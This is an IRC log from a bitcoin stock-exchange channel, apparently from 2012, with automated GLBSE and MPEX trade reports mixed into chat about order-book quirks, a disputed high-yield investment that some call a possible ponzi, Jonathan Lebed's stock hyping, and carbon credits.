Sep 20 08:54:36 Bitcoins are expansive data Sep 20 08:54:42 expensive* Sep 20 08:58:02 [MPEX] [S.MPOE] 5257 @ 0.000413 = 2.1711 BTC [+] Sep 20 08:58:04 [MPEX] [S.MPOE] 2743 @ 0.00041373 = 1.1349 BTC [+] Sep 20 09:02:25 [GLBSE] [RAREEARTH] 2 @ 0.00999 = 0.02 BTC [-] Sep 20 09:15:12 [GLBSE] [OBSI.HRPT] 5 @ 0.101 = 0.505 BTC [-] Sep 20 09:15:13 [GLBSE] [OBSI.HRPT] 5 @ 0.10015 = 0.5008 BTC [-] Sep 20 09:15:40 [GLBSE] [PUREMINING] 8 @ 0.0968 = 0.7744 BTC [+] Sep 20 09:15:42 [GLBSE] [PUREMINING] 43 @ 0.097 = 4.171 BTC [+] Sep 20 09:18:02 [GLBSE] [BAKEWELL] 1 @ 0.1499999 BTC [-] Sep 20 09:24:02 [MPEX] [F.GIGA.ETF] 6303 @ 0.00026389 = 1.6633 BTC [-] Sep 20 09:24:03 [MPEX] [F.GIGA.ETF] 7226 @ 0.00026371 = 1.9056 BTC [-] Sep 20 09:24:05 [MPEX] [S.MPOE] 5354 @ 0.00041115 = 2.2013 BTC [-] Sep 20 09:24:06 [MPEX] [S.MPOE] 38800 @ 0.00041051 = 15.9278 BTC [-] Sep 20 09:24:07 [MPEX] [S.MPOE] 16346 @ 0.00040994 = 6.7009 BTC [-] Sep 20 09:28:12 [GLBSE] [OBSI.HRPT] 5 @ 0.10199499 = 0.51 BTC [+] Sep 20 09:32:09 [GLBSE] [MU] 1 @ 0.2 BTC [+] Sep 20 09:32:11 [GLBSE] [MU] 1 @ 0.19 BTC [-] Sep 20 09:32:12 [GLBSE] [MU] 1 @ 0.181 BTC [-] Sep 20 09:32:48 [GLBSE] [OBSI.HRPT] 5 @ 0.10199499 = 0.51 BTC [+] Sep 20 09:34:38 [GLBSE] [LTC-MINING] 2 @ 0.5999 = 1.1998 BTC [+] Sep 20 09:50:21 [GLBSE] [MMM] 3 @ 0.79 = 2.37 BTC [+] Sep 20 09:52:01 [MPEX] [F.GIGA.ETF] 354 @ 0.00026371 = 0.0934 BTC [-] Sep 20 09:52:03 [MPEX] [F.GIGA.ETF] 14346 @ 0.00026302 = 3.7733 BTC [-] Sep 20 09:53:02 12.71 Sep 20 09:53:13 i mean 12.7! Sep 20 09:53:22 ;;ticker Sep 20 09:53:23 Best bid: 12.5101, Best ask: 12.55, Bid-ask spread: 0.03990, Last trade: 12.55, 24 hour volume: 38630, 24 hour low: 12.2247, 24 hour high: 12.68666 Sep 20 09:59:58 [GLBSE] [OBSI.HRPT] 12 @ 0.101995 = 1.2239 BTC [+] Sep 20 10:01:02 [MPEX] [O.BTCUSD.P180N] 1 @ 0.67023678 BTC [-] Sep 20 10:17:37 [GLBSE] [OBSI.HRPT] 9 @ 0.1019 = 0.9171 BTC [-] Sep 20 10:17:53 [GLBSE] [OBSI.1MHS] 3 @ 0.09995 = 0.2999 BTC [-] Sep 20 10:17:55 [GLBSE] [OBSI.1MHS] 300 @ 0.1 = 30 BTC [+] Sep 20 10:20:36 [GLBSE] [BIF.1YR.LOAN] 4 @ 0.7 = 2.8 BTC [-] Sep 20 10:20:49 [GLBSE] [FDBF] 16 @ 0.14999998 = 2.4 BTC [+] Sep 20 10:20:51 [GLBSE] [FDBF] 60 @ 0.14999999 = 9 BTC [+] Sep 20 10:29:03 [MPEX] [F.GIGA.ETF] 1368 @ 0.00026302 = 0.3598 BTC [-] Sep 20 10:29:04 [MPEX] [S.MPOE] 7600 @ 0.00041373 = 3.1443 BTC [+] Sep 20 10:30:07 [GLBSE] [BIF.1YR.LOAN] 6 @ 0.7 = 4.2 BTC [-] Sep 20 10:31:11 [GLBSE] [TYGRR.BOND-P] 299 @ 0.05 = 14.95 BTC [-] Sep 20 10:33:10 [GLBSE] [OBSI.HRPT] 2 @ 0.1019 = 0.2038 BTC [-] Sep 20 10:33:31 [GLBSE] [ASICMINER] 5 @ 0.1185 = 0.5925 BTC [-] Sep 20 10:33:33 [GLBSE] [ASICMINER] 5 @ 0.11985 = 0.5993 BTC [+] Sep 20 10:33:34 [GLBSE] [ASICMINER] 2 @ 0.119898 = 0.2398 BTC [+] Sep 20 10:33:35 [GLBSE] [ASICMINER] 8 @ 0.121899 = 0.9752 BTC [+] Sep 20 10:34:10 [GLBSE] [ASICMINER] 12 @ 0.121899 = 1.4628 BTC [+] Sep 20 10:36:44 [GLBSE] [ASICMINER] 4 @ 0.121899 = 0.4876 BTC [+] Sep 20 10:36:45 [GLBSE] [ASICMINER] 10 @ 0.1218998 = 1.219 BTC [+] Sep 20 10:36:46 [GLBSE] [ASICMINER] 25 @ 0.1219 = 3.0475 BTC [+] Sep 20 10:36:46 [GLBSE] [ASICMINER] 30 @ 0.12199999 = 3.66 BTC [+] Sep 20 10:36:47 [GLBSE] [ASICMINER] 9 @ 0.12433698 = 1.119 BTC [+] Sep 20 10:36:49 [GLBSE] [ASICMINER] 42 @ 0.12449989 = 5.229 BTC [+] Sep 20 10:37:23 !ticker asicminer Sep 20 10:37:26 [GLBSE:ASICMINER] [Bid: 0.115] [Ask: 0.1185] [Spread: 0.0035] [Last: 0.12449989] [24hVol: 404.96997436] [7dAvg: 0.11327219] Sep 20 10:38:07 now how exactly is the last trade that happened a second ago about 15% over the ask ? Sep 20 10:39:10 I wonder sometimes Sep 20 10:39:36 Unless the ask is by the person who bought the bonds Sep 20 10:40:06 Assuming the wanted another ask in but inputed in the bid section? Sep 20 10:40:13 I did that once actually. Sep 20 10:40:21 And yes, it skips your own asks Sep 20 10:41:50 [MPEX] [O.BTCUSD.P020T] 13 @ 0.02310485 = 0.3004 BTC [-] Sep 20 10:42:07 o, so someone has an ask and then buys for more than they sell at ? Sep 20 10:42:11 this sense, it makes none. Sep 20 10:42:39 It does not indeed. But if you place multiple asks... and by error input a higher value in the bid box Sep 20 10:43:02 hm Sep 20 10:43:11 Actually the ask on GLBSE is at 40 @ 0.12449989 Sep 20 10:43:18 !ticker asicminer Sep 20 10:43:20 [GLBSE:ASICMINER] [Bid: 0.115] [Ask: 0.1185] [Spread: 0.0035] [Last: 0.12449989] [24hVol: 404.96997436] [7dAvg: 0.11327219] Sep 20 10:43:21 I guess the bot has outdated info Sep 20 10:43:28 Maybe it caches it Sep 20 10:43:35 wow, > 5 minutes old ? that makes it darn useless wtf. Sep 20 10:43:52 Eh Sep 20 10:44:46 But yeah, if I have an ask at 1, then want to put another at 1.1 and input 1.1 in the bids instead, it will eat the asks past my 1 ask. Sep 20 10:45:15 Effectively keeping an ask of 1 and an empty zone afterward by my accidental purchase Sep 20 10:45:32 It's a bit stupid but you can't trade with yourself, apparently Sep 20 10:46:44 not sure why it'd work that way but anyway Sep 20 10:47:16 Preferably it would pop an error telling you you're trying to input a bid over your own ask... Sep 20 10:47:21 [GLBSE] [SS] 1 @ 0.01 BTC [-] Sep 20 10:49:35 Anyone here own some OBSI.1MHS? Sep 20 10:50:44 This Sunday after coupon payout will be the time to sell it back to me at 0.1 BTC any new releases will be considerably lower in price. Sep 20 10:52:24 Nope, sorry Sep 20 10:57:13 on that score, anyone here holds obsi.hrpt ? Sep 20 10:58:13 is that one of those scam ponzi assets? Sep 20 10:59:10 you're asking me ?! Sep 20 10:59:17 clients? Sep 20 10:59:32 You mean the contact for HRPT? Sep 20 10:59:45 holds, as in has shares. Sep 20 11:00:31 I'm not sure what you're asking EskimoBob... the money is paid back over time Sep 20 11:02:14 Me too if that happens. They hold a decent chunk of my own money as well. Sep 20 11:04:01 They take the money and use it to fund debt purchases and loans, the pay out interest/bonus payments each week. Once they have enough earnings of their own to fully fund that location the begin capital repayment Sep 20 11:04:14 *they Sep 20 11:05:41 Basically they let their employees bootstrap a new location with their money in exchange for a chance at sharing earnings. Sep 20 11:07:45 [GLBSE] [ASICMINER] 5 @ 0.121 = 0.605 BTC [-] Sep 20 11:07:47 [GLBSE] [ASICMINER] 1 @ 0.12 BTC [-] Sep 20 11:08:01 [MPEX] [S.BVPS] 150 @ 0.00311867 = 0.4678 BTC [+] Sep 20 11:08:12 exactly, once the location is fully funded they take a portion of earnings and pay back initial investment capital. Sep 20 11:09:16 It's worked so far, but I am not sure how great an investment it will be using BTC if the price continues to climb Sep 20 11:09:59 Are you saying they should just go get bank loans? Sep 20 11:11:20 I would say it is legit, maybe not best for the people who take such loans, but there are many such businesses Sep 20 11:12:16 The allow employees to do that. Many max credit cards even to invest. Too much risk to do those things for my taste. Sep 20 11:13:17 As far as bank loans they do use some funding that way, but there are limits with new locations and lack of funding can keep one from being successful Sep 20 11:13:47 [GLBSE] [ASICMINER] 10 @ 0.12 = 1.2 BTC [-] Sep 20 11:14:18 Not with my life's savings Sep 20 11:15:43 How so? Sep 20 11:16:18 I prefer not to say. I have already received a personal threat regarding this. Sep 20 11:16:28 no Sep 20 11:17:50 [GLBSE] [BLUECHIP] 4 @ 0.1 = 0.4 BTC [+] Sep 20 11:17:57 https://bitcointalk.org/index.php?topic=110350.msg1200842#msg1200842 o this is delicious Sep 20 11:18:05 the misunderstood genius. Sep 20 11:18:22 I doubt they will fold unless the economy gets very bad, rates may reduce, but they made it through 2008-2009 Sep 20 11:20:18 They allow employees to scout new locations and pitch them from what I understand. They start new ones a few times a year. Sep 20 11:20:41 it is up to the employees to help make the location successful. Sep 20 11:21:46 why not reinvest the profits instead of borrowing at absurd rates? Sep 20 11:21:57 it would be much more profitable in the long run Sep 20 11:22:24 The rates are employee rates... incentives to make it work. Sep 20 11:22:51 [GLBSE] [OBSI.HRPT] 5 @ 0.1019 = 0.5095 BTC [-] Sep 20 11:24:14 Well I can't say 100% it is not a scam, I am not there in the business seeing all. But they have made returns for a long time now. The chance it might be scam or lose money is why I called it high-risk. Sep 20 11:24:34 [GLBSE] [ASICMINER] 5 @ 0.123 = 0.615 BTC [+] Sep 20 11:24:35 [GLBSE] [ASICMINER] 5 @ 0.124 = 0.62 BTC [+] Sep 20 11:24:41 Obsi: 1%/day is unsustainable Sep 20 11:25:02 and when it ends, no one will know if you were scamming or if you were investing in a scam Sep 20 11:25:10 I know that. I never said it is 1% a day forever, contract states such Sep 20 11:25:35 yeah you can pay 0% forever and take everyone's money! Sep 20 11:25:53 I am not that kind of person. Sep 20 11:27:31 The money is being used, that might not even be possible. Sep 20 11:27:50 I have never requested payment early, it might even ruin the location. Sep 20 11:28:19 on GLBSE? Sep 20 11:29:43 The contract on GLBSE is short, I doubt majority, but that is like going to a breadmaker and telling him you need your money and to sell his ovens right now. Sep 20 11:30:59 Originally I was going to branch out into other high-risk stuff to help keep coupons high, but this asset has been more hassle than it is worth. Sep 20 11:36:24 no one can drag him to court Sep 20 11:36:27 it is right in the contract Sep 20 11:36:34 you can lose at any time Sep 20 11:37:01 Well if it turns out so bad I will do what I can to make it better. I have a decent size mining operation with ASICs on the way hopefully. Sep 20 11:37:11 [MPEX] [F.GIGA.ETF] 1641 @ 0.00026302 = 0.4316 BTC [-] Sep 20 11:37:13 [MPEX] [F.GIGA.ETF] 4759 @ 0.00026293 = 1.2513 BTC [-] Sep 20 11:37:32 Not everyone is a bad person trying to scam. Sep 20 11:37:48 ASICs ordered from BFL Sep 20 11:37:55 up to BFL to deliver Sep 20 11:37:55 but most high yield anonymous funds are scams Sep 20 11:38:07 I agree Sep 20 11:38:16 in fact, I have never seen a legitimate one that pays as much as you do Sep 20 11:38:54 Well it looks like someone started another on cryptostocks, but I cannot vouch for it Sep 20 11:39:34 payday loans are very high interest and bulk consumer debt can make a bundle Sep 20 11:40:45 Obsi: that capital one/W Investment Research Technologies guy is hilarious Sep 20 11:41:06 somehow he got 50btc Sep 20 11:41:06 He has some good reports, but I don't see how he put the money to use so quick Sep 20 11:42:03 I feel like there is a forum somewhere that has scamming competitions Sep 20 11:42:20 where people go the bitcoin forums and see who can scam the most with a new account Sep 20 11:42:31 or scam in the most humorous way Sep 20 11:42:33 dust-otc that's actually true Sep 20 11:42:40 i recall someone posting excerpts months ago Sep 20 11:42:54 anyone heard of /r/gameoftrolls on reddit? Sep 20 11:43:32 says banned Sep 20 11:43:44 Obsi: yeah they shut it down Sep 20 11:44:13 but they would hold competitions for creating fake AMAs / AskReddit posts Sep 20 11:48:50 [GLBSE] [YABMC] 1 @ 0.0622 BTC [-] Sep 20 11:49:33 [GLBSE] [BFLS.RIG] 4 @ 0.8 = 3.2 BTC [-] Sep 20 11:50:10 [GLBSE] [ZETA-MINING] 1 @ 0.18 BTC [-] Sep 20 11:52:41 [GLBSE] [YABMC] 13 @ 0.0622 = 0.8086 BTC [-] Sep 20 11:54:07 [GLBSE] [ZETA-MINING] 4 @ 0.18 = 0.72 BTC [-] Sep 20 11:59:02 [MPEX] [O.BTCUSD.C090T] 600 @ 0.34359046 = 206.1543 BTC [+] Sep 20 12:14:24 [GLBSE] [OBSI.HRPT] 10 @ 0.1019 = 1.019 BTC [-] Sep 20 12:21:44 [GLBSE] [ZETA-MINING] 3 @ 0.18 = 0.54 BTC [-] Sep 20 12:21:45 [GLBSE] [ZETA-MINING] 1 @ 0.21959999 BTC [+] Sep 20 12:21:47 [GLBSE] [ZETA-MINING] 1 @ 0.2196 BTC [+] Sep 20 12:25:02 [MPEX] [F.GIGA.ETF] 5941 @ 0.00026293 = 1.5621 BTC [-] Sep 20 12:25:03 [MPEX] [F.GIGA.ETF] 1347 @ 0.00026257 = 0.3537 BTC [-] Sep 20 12:33:07 [GLBSE] [OBSI.HRPT] 1 @ 0.1019 BTC [-] Sep 20 12:47:55 [GLBSE] [OBSI.HRPT] 6 @ 0.1019 = 0.6114 BTC [-] Sep 20 12:48:50 [GLBSE] [GIGAMINING] 3 @ 0.63520002 = 1.9056 BTC [+] Sep 20 12:51:03 [MPEX] [S.MPOE] 13354 @ 0.00040994 = 5.4743 BTC [-] Sep 20 12:51:04 [MPEX] [S.MPOE] 17416 @ 0.00040985 = 7.1379 BTC [-] Sep 20 12:51:06 [MPEX] [S.MPOE] 4930 @ 0.00040944 = 2.0185 BTC [-] Sep 20 12:53:35 [GLBSE] [ASICMINER] 5 @ 0.121 = 0.605 BTC [-] Sep 20 12:53:37 [GLBSE] [ASICMINER] 139 @ 0.12 = 16.68 BTC [-] Sep 20 12:53:50 [GLBSE] [PUREMINING] 20 @ 0.0969 = 1.938 BTC [-] Sep 20 12:55:19 [GLBSE] [ASICMINER] 1 @ 0.1133 BTC [-] Sep 20 13:01:02 [MPEX] [O.BTCUSD.P140N] 2 @ 0.34778193 = 0.6956 BTC [-] Sep 20 13:03:14 doesnt the bot know? Sep 20 13:03:35 glbse should know Sep 20 13:03:48 look at first trade? Sep 20 13:05:16 btw, speaking of 15 year olds, anyone know Jonathan Lebed ? Sep 20 13:14:25 [GLBSE] [OBSI.HRPT] 12 @ 0.10050001 = 1.206 BTC [-] Sep 20 13:14:26 [GLBSE] [OBSI.HRPT] 2 @ 0.1005 = 0.201 BTC [-] Sep 20 13:14:27 [GLBSE] [OBSI.HRPT] 5 @ 0.1005 = 0.5025 BTC [-] Sep 20 13:14:28 [GLBSE] [OBSI.HRPT] 6 @ 0.1001505 = 0.6009 BTC [-] Sep 20 13:14:29 [GLBSE] [OBSI.HRPT] 21 @ 0.10015 = 2.1032 BTC [-] Sep 20 13:14:30 [GLBSE] [OBSI.HRPT] 1 @ 0.1001 BTC [-] Sep 20 13:14:32 [GLBSE] [OBSI.HRPT] 3 @ 0.1 = 0.3 BTC [-] Sep 20 13:16:56 mircea_popescu: who? Sep 20 13:17:17 .wik Jonathan Lebed Sep 20 13:17:18 "Jonathan Lebed (born September 29, 1984) is an American notorious for using internet technology to hype stocks." - http://en.wikipedia.org/wiki/Jonathan_Lebed Sep 20 13:18:02 [GLBSE] [TICKER] 10 @ 0.35 = 3.5 BTC [-] Sep 20 13:19:24 >1984 Sep 20 13:19:26 >15 years old Sep 20 13:19:46 we are talking 2001. Sep 20 13:19:53 [GLBSE] [ASICMINER] 5 @ 0.12425 = 0.6213 BTC [+] Sep 20 13:19:54 [GLBSE] [ASICMINER] 8 @ 0.12449989 = 0.996 BTC [+] Sep 20 13:19:55 [GLBSE] [ASICMINER] 17 @ 0.1244999 = 2.1165 BTC [+] Sep 20 13:20:02 so wait Sep 20 13:20:08 he was 15 and committing stock fraud? Sep 20 13:20:11 he was in the first dotcom bubble Sep 20 13:20:17 yes. he got away with most of the winnings too Sep 20 13:20:19 cause unprosecutable. Sep 20 13:20:28 I gotta admit, Im impressed Sep 20 13:29:02 [MPEX] [S.MPOE] 44620 @ 0.00041373 = 18.4606 BTC [+] Sep 20 13:29:03 [MPEX] [S.MPOE] 14680 @ 0.000414 = 6.0775 BTC [+] Sep 20 13:34:42 [GLBSE] [OBSI.HRPT] 5 @ 0.10000001 = 0.5 BTC [+] Sep 20 13:34:44 [GLBSE] [OBSI.HRPT] 7 @ 0.1 = 0.7 BTC [-] Sep 20 13:35:23 [GLBSE] [OBSI.HRPT] 12 @ 0.10000001 = 1.2 BTC [+] Sep 20 13:36:48 [GLBSE] [GIGAMINING] 1 @ 0.66899999 BTC [+] Sep 20 13:36:49 [GLBSE] [GIGAMINING] 6 @ 0.66899999 = 4.014 BTC [+] Sep 20 13:38:03 [GLBSE] [OBSI.HRPT] 15 @ 0.10000001 = 1.5 BTC [+] Sep 20 13:38:05 [GLBSE] [HYDRO.BONDS] 2 @ 1.374 = 2.748 BTC [+] Sep 20 13:41:01 [GLBSE] [OBSI.HRPT] 14 @ 0.1 = 1.4 BTC [-] Sep 20 13:41:06 [GLBSE] [GIGAMINING] 1 @ 0.66899999 BTC [+] Sep 20 13:47:08 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 20 13:47:09 [GLBSE] [OBSI.HRPT] 9 @ 0.0986 = 0.8874 BTC [-] Sep 20 13:47:11 [GLBSE] [OBSI.HRPT] 1 @ 0.0981001 BTC [-] Sep 20 13:47:12 [GLBSE] [OBSI.HRPT] 99 @ 0.0981 = 9.7119 BTC [-] Sep 20 13:47:14 [GLBSE] [OBSI.HRPT] 6 @ 0.0981 = 0.5886 BTC [-] Sep 20 13:47:15 [GLBSE] [GIGAMINING] 7 @ 0.6689 = 4.6823 BTC [-] Sep 20 13:47:16 [GLBSE] [GIGAMINING] 3 @ 0.669 = 2.007 BTC [+] Sep 20 13:48:35 [GLBSE] [OBSI.HRPT] 12 @ 0.09860001 = 1.1832 BTC [+] Sep 20 13:48:37 [GLBSE] [OBSI.HRPT] 130 @ 0.098 = 12.74 BTC [-] Sep 20 13:50:08 [GLBSE] [GIGAMINING] 4 @ 0.669 = 2.676 BTC [+] Sep 20 13:54:32 [GLBSE] [OBSI.HRPT] 7 @ 0.09900001 = 0.693 BTC [+] Sep 20 13:54:46 [GLBSE] [GSDPT] 61 @ 0.0034 = 0.2074 BTC [+] Sep 20 13:56:41 [GLBSE] [YABMC] 14 @ 0.0787 = 1.1018 BTC [+] Sep 20 13:56:42 [GLBSE] [YABMC] 99 @ 0.0788 = 7.8012 BTC [+] Sep 20 13:58:13 [GLBSE] [OBSI.HRPT] 13 @ 0.09900001 = 1.287 BTC [+] Sep 20 14:00:44 [GLBSE] [OBSI.HRPT] 10 @ 0.09900001 = 0.99 BTC [+] Sep 20 14:01:38 [GLBSE] [OBSI.HRPT] 82 @ 0.10099999 = 8.282 BTC [+] Sep 20 14:01:44 [GLBSE] [BITBOND] 1 @ 0.334 BTC [+] Sep 20 14:02:04 [GLBSE] [PUREMINING] 10 @ 0.0968 = 0.968 BTC [-] Sep 20 14:02:59 [GLBSE] [OBSI.HRPT] 19 @ 0.09900001 = 1.881 BTC [-] Sep 20 14:03:01 [MPEX] [S.MPOE] 9002 @ 0.00041292 = 3.7171 BTC [-] Sep 20 14:05:28 [GLBSE] [OBSI.HRPT] 17 @ 0.09900001 = 1.683 BTC [-] Sep 20 14:07:31 [GLBSE] [OBSI.HRPT] 14 @ 0.09900001 = 1.386 BTC [-] Sep 20 14:10:33 [GLBSE] [OBSI.HRPT] 13 @ 0.09900001 = 1.287 BTC [-] Sep 20 14:12:21 [GLBSE] [OBSI.HRPT] 3 @ 0.09900001 = 0.297 BTC [-] Sep 20 14:14:08 [GLBSE] [OBSI.HRPT] 11 @ 0.09900001 = 1.089 BTC [-] Sep 20 14:19:32 [GLBSE] [OBSI.HRPT] 9 @ 0.09910001 = 0.8919 BTC [+] Sep 20 14:19:33 [GLBSE] [OBSI.HRPT] 23 @ 0.0991 = 2.2793 BTC [-] Sep 20 14:24:21 [GLBSE] [ASICMINER] 6 @ 0.1244989 = 0.747 BTC [-] Sep 20 14:24:22 [GLBSE] [ASICMINER] 56 @ 0.1244999 = 6.972 BTC [+] Sep 20 14:24:23 [GLBSE] [ASICMINER] 11 @ 0.1245 = 1.3695 BTC [+] Sep 20 14:24:24 [GLBSE] [ASICMINER] 50 @ 0.1247 = 6.235 BTC [+] Sep 20 14:24:26 [GLBSE] [ASICMINER] 23 @ 0.124889 = 2.8724 BTC [+] Sep 20 14:24:27 [GLBSE] [ASICMINER] 4 @ 0.12489 = 0.4996 BTC [+] Sep 20 14:27:52 [GLBSE] [BFLS] 1 @ 0.68 BTC [-] Sep 20 14:28:32 [GLBSE] [BFLS] 2 @ 0.67 = 1.34 BTC [-] Sep 20 14:28:34 [GLBSE] [BFLS] 7 @ 0.67 = 4.69 BTC [-] Sep 20 14:29:02 [MPEX] [F.GIGA.ETF] 8815 @ 0.00026257 = 2.3146 BTC [-] Sep 20 14:29:03 [MPEX] [F.GIGA.ETF] 3179 @ 0.00026207 = 0.8331 BTC [-] Sep 20 14:29:04 [MPEX] [F.GIGA.ETF] 7866 @ 0.00026153 = 2.0572 BTC [-] Sep 20 14:29:38 [GLBSE] [BIF.5-10.MININGBOND] 5 @ 0.745 = 3.725 BTC [-] Sep 20 14:31:49 [GLBSE] [ASICMINER] 11 @ 0.12489 = 1.3738 BTC [+] Sep 20 14:32:30 [GLBSE] [BIF.5-10.MININGBOND] 4 @ 0.75 = 3 BTC [+] Sep 20 14:37:28 [GLBSE] [RSM] 1 @ 0.29999999 BTC [+] Sep 20 14:43:57 [GLBSE] [OBSI.HRPT] 1 @ 0.10099998 BTC [+] Sep 20 14:43:58 [GLBSE] [OBSI.HRPT] 3 @ 0.10099999 = 0.303 BTC [+] Sep 20 14:54:11 [MPEX] [F.GIGA.ETF] 4762 @ 0.00026153 = 1.2454 BTC [-] Sep 20 15:08:03 memories Sep 20 15:08:09 like the corners of my mind Sep 20 15:20:02 [MPEX] [S.MPOE] 600 @ 0.00041292 = 0.2478 BTC [-] Sep 20 15:33:38 [GLBSE] [GIGAMINING] 2 @ 0.669 = 1.338 BTC [+] Sep 20 15:36:24 [GLBSE] [OBSI.HRPT] 93 @ 0.10099999 = 9.393 BTC [+] Sep 20 15:37:03 [GLBSE] [OBSI.HRPT] 100 @ 0.101 = 10.1 BTC [+] Sep 20 15:39:42 [GLBSE] [GIGAMINING] 1 @ 0.669 BTC [+] Sep 20 15:39:43 [GLBSE] [GIGAMINING] 13 @ 0.67 = 8.71 BTC [+] Sep 20 15:39:45 [GLBSE] [GIGAMINING] 12 @ 0.6975 = 8.37 BTC [+] Sep 20 15:39:46 [GLBSE] [GIGAMINING] 9 @ 0.6979 = 6.2811 BTC [+] Sep 20 15:39:47 [GLBSE] [GIGAMINING] 10 @ 0.699 = 6.99 BTC [+] Sep 20 15:39:48 [GLBSE] [GIGAMINING] 9 @ 0.6995 = 6.2955 BTC [+] Sep 20 15:42:54 [GLBSE] [GIGAMINING] 89 @ 0.7 = 62.3 BTC [+] Sep 20 15:44:37 [GLBSE] [PUREMINING] 6 @ 0.0969 = 0.5814 BTC [+] Sep 20 15:47:02 [MPEX] [S.MPOE] 10320 @ 0.000414 = 4.2725 BTC [+] Sep 20 15:47:04 [MPEX] [S.MPOE] 29600 @ 0.00041487 = 12.2802 BTC [+] Sep 20 15:47:05 [MPEX] [S.MPOE] 6398 @ 0.000415 = 2.6552 BTC [+] Sep 20 15:48:35 [GLBSE] [BITCOINMINV] 4 @ 0.12499999 = 0.5 BTC [-] Sep 20 15:52:50 [GLBSE] [PAJKA.BOND] 2 @ 0.0823 = 0.1646 BTC [-] Sep 20 16:00:09 [GLBSE] [MU] 1 @ 0.23 BTC [+] Sep 20 16:02:56 [GLBSE] [GMVT-BOT] 2 @ 0.13 = 0.26 BTC [+] Sep 20 16:02:58 [GLBSE] [GMVT-BOT] 38 @ 0.12 = 4.56 BTC [-] Sep 20 16:02:59 [GLBSE] [GMVT-BOT] 10 @ 0.11 = 1.1 BTC [-] Sep 20 16:03:49 [GLBSE] [MMM] 4 @ 0.79 = 3.16 BTC [+] Sep 20 16:05:32 [GLBSE] [TYGRR.BOND-A] 9 @ 0.112 = 1.008 BTC [-] Sep 20 16:05:34 [GLBSE] [TYGRR.BOND-A] 25 @ 0.115 = 2.875 BTC [+] Sep 20 16:06:28 [GLBSE] [OBSI.HRPT] 3 @ 0.1019 = 0.3057 BTC [+] Sep 20 16:07:04 [GLBSE] [YABMC] 30 @ 0.09 = 2.7 BTC [+] Sep 20 16:10:48 [GLBSE] [GIGAMINING] 4 @ 0.689 = 2.756 BTC [-] Sep 20 16:13:01 [MPEX] [S.MPOE] 1900 @ 0.000415 = 0.7885 BTC [+] Sep 20 16:13:08 [GLBSE] [PUREMINING] 3 @ 0.0969 = 0.2907 BTC [+] Sep 20 16:13:20 [GLBSE] [BITCOINMINV] 7 @ 0.125 = 0.875 BTC [+] Sep 20 16:18:30 >Learn about our historic commodity and carbon credit trades using Ven. Sep 20 16:18:32 omfg Sep 20 16:18:35 green nazi ppl Sep 20 16:19:57 ban carbon credits Sep 20 16:19:57 they also do gold funds Sep 20 16:20:05 its a fuckin scam Sep 20 16:20:36 if you've got no need for it then don't buy it Sep 20 16:20:43 some companies in the EU have to buy them Sep 20 16:20:48 buy gold instead Sep 20 16:20:51 or a smoothie Sep 20 16:21:05 [GLBSE] [GIGAMINING] 5 @ 0.689 = 3.445 BTC [-] Sep 20 16:21:07 [GLBSE] [GIGAMINING] 20 @ 0.69 = 13.8 BTC [+] Sep 20 16:23:13 <3 co2 Sep 20 16:25:01 I like the carbon trade idea. Of course there's a reason for buying them too. If you believe that regulations will tighten or dirty power will be popular, then it makes sense to hold the credits. Sep 20 16:25:10 them biased newspapers! Sep 20 16:25:30 lol Sep 20 16:27:34 No, make it part of the market and calculate the worth of a company based on how sustainable they are. Instead of totally ignoring that aspect of the entire world and keeping it off the books. Sep 20 16:28:12 Boosh. Sep 20 16:28:36 [GLBSE] [TYGRR.BOND-A] 16 @ 0.115 = 1.84 BTC [+] Sep 20 16:34:49 [GLBSE] [NYAN] 1 @ 0.945 BTC [-] Sep 20 16:35:34 [GLBSE] [NYAN.A] 5 @ 1.145 = 5.725 BTC [+] Sep 20 16:36:29 [GLBSE] [NYAN.B] 1 @ 1.01999999 BTC [+] Sep 20 16:36:30 [GLBSE] [NYAN.B] 5 @ 1.02 = 5.1 BTC [+] Sep 20 16:37:32 Will there be a stock offering? Sep 20 16:38:01 [MPEX] [F.GIGA.ETF] 6072 @ 0.00026153 = 1.588 BTC [-] Sep 20 16:38:03 [MPEX] [F.GIGA.ETF] 7000 @ 0.00026152 = 1.8306 BTC [-] Sep 20 16:38:04 [MPEX] [F.GIGA.ETF] 4508 @ 0.00026135 = 1.1782 BTC [-] Sep 20 16:38:25 bitcoin carbon offset fund - plant a tree with bitcoin! Sep 20 16:38:49 w00t great deal!! Sep 20 16:39:01 [GLBSE] [NYAN.C] 26 @ 0.34 = 8.84 BTC [+] Sep 20 16:39:02 lol Sep 20 16:39:03 [GLBSE] [NYAN.C] 20 @ 0.35 = 7 BTC [+] Sep 20 16:42:51 bitcoin and human rights? HAHAHA Sep 20 16:43:48 Smoovious, slaves produce co2 Sep 20 16:44:27 just use nukes. Sep 20 16:45:05 um wtf lol Sep 20 16:45:59 nefario is not anti slavery is he? he has not voiced on the issue Sep 20 16:46:28 "The Church of Ice & The Holy Frozen Dingleberry" lulz Sep 20 16:48:11 [GLBSE] [SILVER] 2 @ 0.01 = 0.02 BTC [+] Sep 20 16:49:04 http://www.encyclopediabitcoinica.com/wiki/GoatsOnABoat Sep 20 16:49:06 goat Sep 20 16:49:25 i know Smoovious, its just that slaves are not an excuse you dont produce co2 Sep 20 16:49:41 or is it Sep 20 16:49:46 make it so they pay the tax Sep 20 16:50:10 well, semi ready Sep 20 16:53:43 https://bitcointalk.org/index.php?topic=110768.msg1206690#msg1206690 Sep 20 16:55:18 and a blue market asset jeez Sep 20 16:55:26 thats the highest order? Sep 20 16:55:41 if its is, glbse is becoming a joke Sep 20 16:56:28 lol Sep 20 16:56:39 this is kinda funny tbh Sep 20 16:58:20 kakobrekla: why is it funny Sep 20 16:58:27 this is a real business Sep 20 16:58:29 registered Sep 20 16:58:33 millions in revenue Sep 20 16:58:43 presence all over the world Sep 20 16:58:52 isn't this what we're trying to do with bitcoin> Sep 20 16:58:53 ? Sep 20 16:58:59 bring it into the real economy? Sep 20 16:59:01 nefario tomorrow i will be on a plane :/ Sep 20 16:59:04 tie the two together? Sep 20 16:59:07 and they wont let me bring my boat Sep 20 16:59:16 Chaaang-Noi: take a chooper Sep 20 16:59:18 this Van bullshit is not real economy Sep 20 16:59:19 chopper Sep 20 16:59:26 you can get real goods with it Sep 20 16:59:26 hmm... Sep 20 16:59:34 I bought a membership here for a month with it Sep 20 16:59:35 its scamconomy Sep 20 16:59:36 got my lunch Sep 20 17:00:01 nefario is very naive i see. Sep 20 17:00:18 nefario can we ahve slave trading on glbse? also when will you post your guide to what we can list? Sep 20 17:00:21 thinkfoil had not strong enough. Sep 20 17:00:29 thin* Sep 20 17:01:23 hat* ? Sep 20 